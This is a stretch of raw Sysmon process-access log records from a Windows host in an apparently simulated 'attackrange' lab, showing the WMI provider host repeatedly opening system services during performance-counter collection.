21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150629Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150628Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150627Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150626Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150625Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150624Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150623Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150622Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150621Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150620Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150619Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150618Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150617Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150616Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150615Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150614Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 